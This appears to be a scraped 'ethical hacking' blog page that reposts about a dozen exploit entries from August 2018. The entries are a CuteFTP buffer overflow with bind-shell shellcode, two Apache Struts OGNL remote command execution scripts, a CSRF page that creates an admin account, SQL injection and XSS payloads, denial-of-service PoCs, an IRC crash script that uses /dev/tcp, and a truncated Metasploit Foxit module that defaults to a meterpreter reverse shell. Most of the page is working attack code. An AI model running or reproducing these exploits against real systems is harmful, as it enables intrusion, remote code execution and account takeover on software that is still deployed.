# Exploit Title: SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-23
# Vendor Homepage: https://www.skype.com/es/home/
# Tested Version: 12.8.487.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python SkypeApp_12.8.487.0.py
# 2.- Open SkypeApp_12.8.487.0.txt and copy content to clipboard
# 3.- Open SkypeApp.exe
# 4.- Paste ClipBoard on "Cuenta de Skype o Microsoft"
# 5.- Siguiente
# 6.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 65225
f = open ("SkypeApp_12.8.487.0.txt", "w")
f.write(buffer)
f.close()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863576322
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: ManageEngine ADManager Plus 6.5.7 - HTML Injection
# Date: 2018-08-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.manageengine.com/
# Hardware Link : https://www.manageengine.com/products/ad-manager/
# Software : ZOHO Corp ManageEngine ADManager Plus
# Product Version: 6.5.7
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection
# CVE : CVE-2018-15608
# ZOHO Corp ManageEngine ADManager Plus 6.5.7 allows HTML Injection on
# the "AD Delegation" "Help Desk Technicians" screen.
# HTTP Request Header :
Request URL: http://172.16.2.105:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows
Request Method: POST
Status Code: 200 OK
Remote Address: 172.16.2.105:8080
Referrer Policy: no-referrer-when-downgrade
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Content-Length: 301
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=79DE1A7AE1DC5B7D88FCBF02AB425987; JSESSIONIDSSO=19AA1682A937F344D1DCB190B31343FB
Host: 172.16.2.105:8080
Origin: http://172.16.2.105:8080
Referer: http://172.16.2.105:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
X-Requested-With: XMLHttpRequest
# HTTP Response Header :
Content-Length: 3753
Content-Type: text/html;charset=UTF-8
Date: Tue, 14 Aug 2018 10:14:32 GMT
Server: Apache-Coyote/1.1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1
# Query String Parameters :
methodToCall: listTechnicianRows
# Form Data :
params: {"startIndex":1,"range":10,"searchText":"\"><h1>Ismail Tasdelen</h1>","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView}
adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2
# Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
# Google Dork: intext:"/wp-content/plugins/gift-voucher/"
# Date: 2018-08-23
# Exploit Author: Renos Nikolaou
# Software Link: https://wordpress.org/plugins/gift-voucher/
# Vendor Homepage: http://www.codemenschen.at/
# Version: 1.0.5
# Tested on: Windows 10
# CVE: N/A
# Description : The vulnerability allows an attacker to inject sql commands
# on 'template_id' parameter.
# PoC - Blind SQLi :
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://domain.com/gift-voucher/
Content-Length: 62
Cookie: PHPSESSID=efa4of1gq42g0nd9nmj8dska50; __stripe_mid=1f8c5bef-b440-4803-bdd5-f0d0ea22007e; __stripe_sid=de547b6b-fa31-46a1-972b-7b3324272a23
Connection: close
action=wpgv_doajax_front_template&template_id=1 and sleep(15)#
Parameter: template_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=wpgv_doajax_front_template&template_id=1 AND 4448=4448
Vector: AND [INFERENCE]
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
banner: '5.5.59'
# Exploit Title: CuteFTP 5.0 - Buffer Overflow
# Author: Matteo Malvica
# Date: 2018-08-26
# Vendor homepage: www.globalscape.com
# Software: CuteFTP 5.0.4 XP - build 54.8.6.1
# Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe
# Tested on: Windows XP Profesional SP3 English x86
# STEPS:
# 1. The python script will generate an 'exploit.txt' file.
# 2. Start CuteFTP
# 3. In the program menu click "File" > "Site Manager" > "New" and paste the content of
# the exploit file into the 'label' field and provide a dummy IP addresss.
# 4. Right click on the site name and 'create shortcut'
# 5. Rename the shortcut to whatever name you prefer: this will create an exe that automates exploit loading upon clicking.
# 6. Quit CuteFTP and launch the newly created 'shortcut'.exe
# 7. $ nc [target_ip] 6666
# 8. celebrate moderately
ret="\xD8\xFC\x91\x7C" #ntdll.dll 7C91FCD8
nops = '\x90'*30
#msfvenom -p windows/shell_bind_tcp LPORT=6666 -b '\x0a\x00\x0d' -f python
sc = ""
sc += "\xdb\xd8\xb8\xa7\x37\x29\x0e\xd9\x74\x24\xf4\x5b\x33"
sc += "\xc9\xb1\x53\x31\x43\x17\x83\xeb\xfc\x03\xe4\x24\xcb"
sc += "\xfb\x16\xa2\x89\x04\xe6\x33\xee\x8d\x03\x02\x2e\xe9"
sc += "\x40\x35\x9e\x79\x04\xba\x55\x2f\xbc\x49\x1b\xf8\xb3"
sc += "\xfa\x96\xde\xfa\xfb\x8b\x23\x9d\x7f\xd6\x77\x7d\x41"
sc += "\x19\x8a\x7c\x86\x44\x67\x2c\x5f\x02\xda\xc0\xd4\x5e"
sc += "\xe7\x6b\xa6\x4f\x6f\x88\x7f\x71\x5e\x1f\x0b\x28\x40"
sc += "\x9e\xd8\x40\xc9\xb8\x3d\x6c\x83\x33\xf5\x1a\x12\x95"
sc += "\xc7\xe3\xb9\xd8\xe7\x11\xc3\x1d\xcf\xc9\xb6\x57\x33"
sc += "\x77\xc1\xac\x49\xa3\x44\x36\xe9\x20\xfe\x92\x0b\xe4"
sc += "\x99\x51\x07\x41\xed\x3d\x04\x54\x22\x36\x30\xdd\xc5"
sc += "\x98\xb0\xa5\xe1\x3c\x98\x7e\x8b\x65\x44\xd0\xb4\x75"
sc += "\x27\x8d\x10\xfe\xca\xda\x28\x5d\x83\x2f\x01\x5d\x53"
sc += "\x38\x12\x2e\x61\xe7\x88\xb8\xc9\x60\x17\x3f\x2d\x5b"
sc += "\xef\xaf\xd0\x64\x10\xe6\x16\x30\x40\x90\xbf\x39\x0b"
sc += "\x60\x3f\xec\xa6\x68\xe6\x5f\xd5\x95\x58\x30\x59\x35"
sc += "\x31\x5a\x56\x6a\x21\x65\xbc\x03\xca\x98\x3f\x31\x01"
sc += "\x14\xd9\x2f\x05\x70\x71\xc7\xe7\xa7\x4a\x70\x17\x82"
sc += "\xe2\x16\x50\xc4\x35\x19\x61\xc2\x11\x8d\xea\x01\xa6"
sc += "\xac\xec\x0f\x8e\xb9\x7b\xc5\x5f\x88\x1a\xda\x75\x7a"
sc += "\xbe\x49\x12\x7a\xc9\x71\x8d\x2d\x9e\x44\xc4\xbb\x32"
sc += "\xfe\x7e\xd9\xce\x66\xb8\x59\x15\x5b\x47\x60\xd8\xe7"
sc += "\x63\x72\x24\xe7\x2f\x26\xf8\xbe\xf9\x90\xbe\x68\x48"
sc += "\x4a\x69\xc6\x02\x1a\xec\x24\x95\x5c\xf1\x60\x63\x80"
sc += "\x40\xdd\x32\xbf\x6d\x89\xb2\xb8\x93\x29\x3c\x13\x10"
sc += "\x59\x77\x39\x31\xf2\xde\xa8\x03\x9f\xe0\x07\x47\xa6"
sc += "\x62\xad\x38\x5d\x7a\xc4\x3d\x19\x3c\x35\x4c\x32\xa9"
sc += "\x39\xe3\x33\xf8"
buffer = "A" * 520+ ret + nops + sc + "C" * (3572 - len(sc))
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s recreational bytes..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-08-24
# Exploit Author: GunEggWang
# Vendor Homepage: https://gleezcms.org/
# Software Link: https://github.com/gleez/cms
# Version: 1.2.0
# CVE : CVE-2018-15845
# Description:
# There is a CSRF vulnerability that can add an administrator account in
# Gleez CMS 1.2.0 via admin/users/add. (https://github.com/gleez/cms/issues/800)
# After the administrator logged in,open the POC,that will create an new admin account unexcused.
# POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://server/admin/users/add?0=" method="POST">
<input type="hidden" name="_token" value="18eabd0645699b3eec1686301a684392e8a4735a" />
<input type="hidden" name="_action" value="909998bbc9e60ce40ae378a1055b46f3" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="pass" value="test" />
<input type="hidden" name="nick" value="test" />
<input type="hidden" name="mail" value="admin@admin.cc" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="roles[admin]" value="Administrative user, has access to everything." />
<input type="hidden" name="site_url" value="http://server/" />
<input type="hidden" name="user" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Firefox 55.0.3 - Denial of Service (PoC)
# Date: 2018-08-26
# Exploit Author: L0RD
# Vendor Homepage: mozilla.org
# Software Link: https://www.mozilla.org/en-US/firefox/55.0.3/releasenotes/
# Version: 55.0.3
# Tested on: Windows 10
# CVE: N/A
# Description :
# An issue was discovered in firefox 55.0.3 which an attacker can create a
# webpage and put javascript payload to crash user's browser or put user in
# non-responsive state.
# Exploit :
/* We don't need to create any element on webpage.we just set body
attribute with our buffer variable*/
<script>
var buffer = "";
for(var i=0;i<0x11170;i++){
for(j=0;j<=0x9C40;j++){
buffer += "\x44";
}
}
document.body.style.backgroundColor = buffer;
</script>
# Exploit Title: ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
# Date: 2018-08-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.manageengine.com/
# Hardware Link : https://www.manageengine.com/products/ad-manager/
# Software : ZOHO Corp ManageEngine ADManager Plus
# Product Version: 6.5.7
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : N/A
# Zoho ManageEngine ADManager Plus 6.5.7 allows XSS on the "Workflow Delegation" "Requesters" screen.
# HTTP Request Header :
Request URL: http://TARGET:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows
Request Method: POST
Status Code: 200 OK
Remote Address: TARGET:8080
Referrer Policy: no-referrer-when-downgrade
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Content-Length: 320
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=3CED862790101335DD0EB05EE42E4972; JSESSIONIDSSO=3E6785DB8D6DFD46D6C729579E68418D
Host: TARGET:8080
Origin: http://TARGET:8080
Referer: http://TARGET:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
X-Requested-With: XMLHttpRequest
# HTTP Response Header :
Content-Length: 3753
Content-Type: text/html;charset=UTF-8
Date: Tue, 14 Aug 2018 10:14:32 GMT
Server: Apache-Coyote/1.1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1
# Query String Parameters :
methodToCall: listTechnicianRows
# Form Data :
params: {"startIndex":1,"range":10,"searchText":"\"><img src=x onerror=alert('TESTER')>","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView}
adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2018-11776 Exploit
# Author:
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
# This code uses a payload from:
# https://github.com/jas502n/St2-057
# *****************************************************
import argparse
import random
import requests
import sys
try:
from urllib import parse as urlparse
except ImportError:
import urlparse
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
if len(sys.argv) <= 1:
print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')
print('[*] Struts-PWN - @mazen160')
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("-c", "--cmd",
dest="cmd",
help="Command to execute. (Default: 'id')",
action='store',
default='id')
parser.add_argument("--exploit",
dest="do_exploit",
help="Exploit.",
action='store_true')
args = parser.parse_args()
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
cmd = args.cmd if args.cmd else None
do_exploit = args.do_exploit if args.do_exploit else None
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Accept': '*/*'
}
timeout = 3
def parse_url(url):
"""
Parses the URL.
"""
# url: http://example.com/demo/struts2-showcase/index.action
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str("http://") + str(url)
scheme = urlparse.urlparse(url).scheme
# Site: http://example.com
site = scheme + '://' + urlparse.urlparse(url).netloc
# FilePath: /demo/struts2-showcase/index.action
file_path = urlparse.urlparse(url).path
if (file_path == ''):
file_path = '/'
# Filename: index.action
try:
filename = url.split('/')[-1]
except IndexError:
filename = ''
# File Dir: /demo/struts2-showcase/
file_dir = file_path.rstrip(filename)
if (file_dir == ''):
file_dir = '/'
return({"site": site,
"file_dir": file_dir,
"filename": filename})
def build_injection_inputs(url):
"""
Builds injection inputs for the check.
"""
parsed_url = parse_url(url)
injection_inputs = []
url_directories = parsed_url["file_dir"].split("/")
try:
url_directories.remove("")
except ValueError:
pass
for i in range(len(url_directories)):
injection_entry = "/".join(url_directories[:i])
if not injection_entry.startswith("/"):
injection_entry = "/%s" % (injection_entry)
if not injection_entry.endswith("/"):
injection_entry = "%s/" % (injection_entry)
injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload.
injection_entry += parsed_url["filename"]
injection_inputs.append(injection_entry)
return(injection_inputs)
def check(url):
random_value = int(''.join(random.choice('0123456789') for i in range(2)))
multiplication_value = random_value * random_value
injection_points = build_injection_inputs(url)
parsed_url = parse_url(url)
print("[%] Checking for CVE-2018-11776")
print("[*] URL: %s" % (url))
print("[*] Total of Attempts: (%s)" % (len(injection_points)))
attempts_counter = 0
for injection_point in injection_points:
attempts_counter += 1
print("[%s/%s]" % (attempts_counter, len(injection_points)))
testing_url = "%s%s" % (parsed_url["site"], injection_point)
testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value))
try:
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
except Exception as e:
print("EXCEPTION::::--> " + str(e))
continue
if "Location" in resp.headers.keys():
if str(multiplication_value) in resp.headers['Location']:
print("[*] Status: Vulnerable!")
return(injection_point)
print("[*] Status: Not Affected.")
return(None)
def exploit(url, cmd):
parsed_url = parse_url(url)
injection_point = check(url)
if injection_point is None:
print("[%] Target is not vulnerable.")
return(0)
print("[%] Exploiting...")
payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd)
testing_url = "%s%s" % (parsed_url["site"], injection_point)
testing_url = testing_url.replace("{{INJECTION_POINT}}", payload)
try:
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
except Exception as e:
print("EXCEPTION::::--> " + str(e))
return(1)
print("[%] Response:")
print(resp.text)
return(0)
def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
if url:
if not do_exploit:
check(url)
else:
exploit(url, cmd)
if usedlist:
URLs_List = []
try:
f_file = open(str(usedlist), "r")
URLs_List = f_file.read().replace("\r", "").split("\n")
try:
URLs_List.remove("")
except ValueError:
pass
f_file.close()
except Exception as e:
print("Error: There was an error in reading list file.")
print("Exception: " + str(e))
exit(1)
for url in URLs_List:
if not do_exploit:
check(url)
else:
exploit(url, cmd)
print("[%] Done.")
if __name__ == "__main__":
try:
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
except KeyboardInterrupt:
print("\nKeyboardInterrupt Detected.")
print("Exiting...")
exit(0)
# Exploit Title: RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-08-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link : https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c4504ex-color-laser-multifunction-printer/_/R-417998
# Software : RICOH Printer
# Product Version: MP C4504ex
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection
# CVE : CVE-2018-15884
# CSRF vulnerability has been discovered on the printer of MP C4504ex of RICOH product.
# Low priviliage users are able to create administrator accounts
HTTP POST Request :
POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 193
Cookie: risessionid=132072532817225; cookieOnOffChecker=on; wimsesid=103007361
Connection: close
mode=ADDUSER&step=BASE&wimToken=2051165463&entryIndexIn=00007&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
HTTP Response Request :
GET /success.txt HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Connection: close
# Exploit Title: Libpango 1.40.8 - Denial of Service (PoC)
# Date: 2018-08-06
# Exploit Author: Jeffery M
# Vendor Homepage: https://www.pango.org/
# Software Link: http://ftp.gnome.org/pub/GNOME/sources/pango/1.40/pango-1.40.9.tar.xz
# Version: 1.40.8+
# Tested on: Windows 7, Gentoo
# CVE : CVE-2018-15120
# Patch : https://github.com/GNOME/pango/commit/71aaeaf020340412b8d012fe23a556c0420eda5f
# Description:
# Invalid Unicode sequences, such as 0x2665 0xfe0e 0xfe0f, can trick the
# Emoji iter code into returning an empty segment, which then triggers
# an assertion in the itemizer.
# POC:
# Save the below as irc_com_dump; chmod +x irc_com_dump;connect to an
# irc server with something linked against libpango 1.40.8 or higher
# (e.g. hexchat 2.14.1 [ can be obtained on my server
# http://order.a.whore.website/HexChat%202.14.1%20x86.exe ), then run
# the following:
irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'
This is a rudimentary example of how this attack can be used.
#!/bin/bash
# Name: irc_com_dump
# Save this script as irc_com_dump
# run as follows on irc.laks.ml or a server of your choice
# irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'
# When the user receives the message it will trigger the assertion fail.
###
helpfunc ()
{
sed -nre '/sed/d;/bash/,/###/{1d;s/^# //g;s/###//;p}' $0;
}
if [[ $# -lt 1 ]] || [[ $1 =~ ^-?-h ]] ; then
helpfunc && exit 1
fi
# So we can send unicode without having to do shit.
LC_ALL=en_US.utf8
export LC_ALL
export allargs=("$@")
#test_ping ()
#{
# if [[ ! -n $PING ]]; then
# export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
# fi;
#}
if [[ -n ${DEBUG} ]] ; then
declare -p allargs
fi
export name=magicrun${RANDOM}
if [[ -n ${NORANDOM} ]] ; then
export name=magicdebug
fi
run_irc_com ()
{
set -vx
echo ${allargs[1]}
# if ( ( ( [[ ! ${allargs[1]} =~ [a-zA-Z].* ]] || true) && ( [[
${allargs[1]} =~ [0-9].*[0-9] ]] && [[ ! ${allargs[0]} =~ .*[.].*
]] || true) ) ) ; then
if [[ ! ${allargs[0]} =~ .*[.].* && ${allargs[1]} =~ ^[0-9]+[0-9]?$
&& ! ${allargs[1]} =~ .*[a-zA-Z].* || $# -eq 1 ]] ; then
export COMM="$@";
else
export s=$1
export p=$2
export COMM="${@:3}"
if [[ $p =~ .*[a-zA-Z] ]] ; then
unset s p
export COMM="${allargs[@]}"
fi
fi
test -z $s||false && exec 5<> /dev/tcp/irc.laks.ml/6667 || test
-n $s && echo s is $s;exec 5<>/dev/tcp/$s/$p
set +vx
echo -e 'USER '${name}' 8 ''*'' :'${name}'\nNICK '${name}'\n' 1>&5
2>&1 | stdbuf -i0 -o0 cat - 0<&5 > /dev/stdout | while read h; do
if [[ ! -n $PING ]]; then
export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
fi;
## test_ping;
echo -e "${PING}\n" 1>&5
if [[ ! -n $PINGSENT ]] && [[ -n $PING ]] ; then
export PINGSENT=isentmyping;
fi;
if [[ -z $COMMSENT ]] && [[ -n $PINGSENT ]] && [[ -n $PING ]] ; then
echo -e "${COMM}\nQUIT\n" 1>&5 2>&1
fi
echo "$h" 2>&1;
done
}
run_irc_com ${allargs[@]} |& sed -ne "/:$name MODE $name
:+iwx/,/\x04/p" | sed -e "/:$name MODE $name/d" -e '/^ERROR
:Closing/d' | awk -F" $name " '{print $2}'
# Exploit Title: Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-26
# Vendor Homepage: https://www.trendmicro.com/en_se/business/products/user-protection/sps/mobile.html
# Software Link: App Store for iOS devices
# Tested Version: 2.0.0.1700
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1
# Steps to Produce the Crash:
# 1.- Run python code: Enterprise_Mobile_Security_2.0.0.1700.py
# 2.- Copy content to clipboard
# 3.- Open App Enterprise Mobile Security
# 4.- Inscribirse manualmente
# 5.- Servidor local
# 6.- Paste ClipBoard on "Servidor:"
# 7.- Puerto: 80
# 8.- Siguiente
# 9.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 153844
print (buffer)
#!/usr/bin/python
# -*- coding: utf-8 -*-
# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
import sys
import urllib
import urllib2
import httplib
def exploit(host,cmd):
print "[Execute]: {}".format(cmd)
ognl_payload = "${"
ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)."
ognl_payload += "(#cmd='{}').".format(cmd)
ognl_payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
ognl_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd}))."
ognl_payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
ognl_payload += "(#p.redirectErrorStream(true))."
ognl_payload += "(#process=#p.start())."
ognl_payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
ognl_payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
ognl_payload += "(#ros.flush())"
ognl_payload += "}"
if not ":" in host:
host = "{}:8080".format(host)
# encode the payload
ognl_payload_encoded = urllib.quote_plus(ognl_payload)
# further encoding
url = "http://{}/{}/help.action".format(host, ognl_payload_encoded.replace("+","%20").replace(" ", "%20").replace("%2F","/"))
print "[Url]: {}\n\n\n".format(url)
try:
request = urllib2.Request(url)
response = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
response = e.partial
print response
if len(sys.argv) < 3:
sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])
else:
exploit(sys.argv[1],sys.argv[2])
# Exploit Title: Sentrifugo HRMS 3.2 - 'deptid' SQL Injection
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-08-26
# Google Dork: N/A
# Vendor: http://www.sapplica.com
# Software Link: http://www.sentrifugo.com/download
# Affected Version: 3.2 and possibly before
# Patched Version: unpatched
# Category: Web Application
# Platform: PHP
# Tested on: Win10x64 & Kali Linux
# CVE: N/A
# 1. Technical Description:
# Sentrifugo HRMS version 3.2 and possibly before are affected by Blind SQL Injection in deptid
# parameter through POST request in "/index.php/servicedeskconf/getemployees/format/html" resource.
# This allows a user of the application without permissions to read sensitive information from
# the database used by the application.
# 2. Proof Of Concept (PoC):
# 2.1 The following POST request generates an error 500 in the Application (add ' in deptid parameter)
POST /sentrifugo/index.php/servicedeskconf/getemployees/format/html HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sentrifugo/index.php/servicedeskconf/add
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 28
Cookie: PHPSESSID=25kchrvj0e3akklgh0inrubqu0
Connection: close
bunitid=0&deptid='&reqfor=2
# 2.2 In another request, add two ' to receive a code 200 OK
POST /sentrifugo/index.php/servicedeskconf/getemployees/format/html HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sentrifugo/index.php/servicedeskconf/add
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 28
Cookie: PHPSESSID=25kchrvj0e3akklgh0inrubqu0
Connection: close
bunitid=0&deptid=''&reqfor=2
# 3. Payload:
Parameter: deptid (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: bunitid=0&deptid=(SELECT (CASE WHEN (5610=5610) THEN 5610 ELSE 5610*(SELECT 5610 FROM INFORMATION_SCHEMA.PLUGINS) END))&reqfor=2
# 4. Reference:
# https://hackpuntes.com/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => 'Foxit PDF Reader Pointer Overwrite UAF',
'Description' => %q{
Foxit PDF Reader v9.0.1.1049 has a Use-After-Free vulnerability
in the Text Annotations component and the TypedArray's use
uninitialized pointers.
The vulnerabilities can be combined to leak a vtable memory address,
which can be adjusted to point to the base address of the executable.
A ROP chain can be constructed that will execute when Foxit Reader
performs the UAF.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me', # Use-after-free and PoC
'bit from meepwn', # Uninitialized pointer
'saelo', # JavaScript Garbage Collector
'Jacob Robles' # Metasploit Module
],
'References' =>
[
['CVE', '2018-9948'],
['CVE', '2018-9958'],
['ZDI', '18-332'],
['ZDI', '18-342'],
['URL', 'https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html'],
['URL', 'https://srcincite.io/pocs/cve-2018-99{48,58}.pdf.txt']
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => true,
'FILENAME' => 'test.pdf',
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
},
'Platform' => 'win',
'Targets' =>
[
['Windows 10 Pro x64 Build 17134', {}]
],
'DisclosureDate' => 'Apr 20 2018',
'DefaultTarget' => 0))
register_options([
OptString.new('EXENAME', [false, 'EXE file to download', '']),
OptString.new('SHARE', [false, 'SMB share hosting exe', ''])
])
end
def pdfdoc
share = datastore['SHARE'].empty? ? "#{Rex::Text.rand_text_alpha_lower(1)}" : datastore['SHARE']
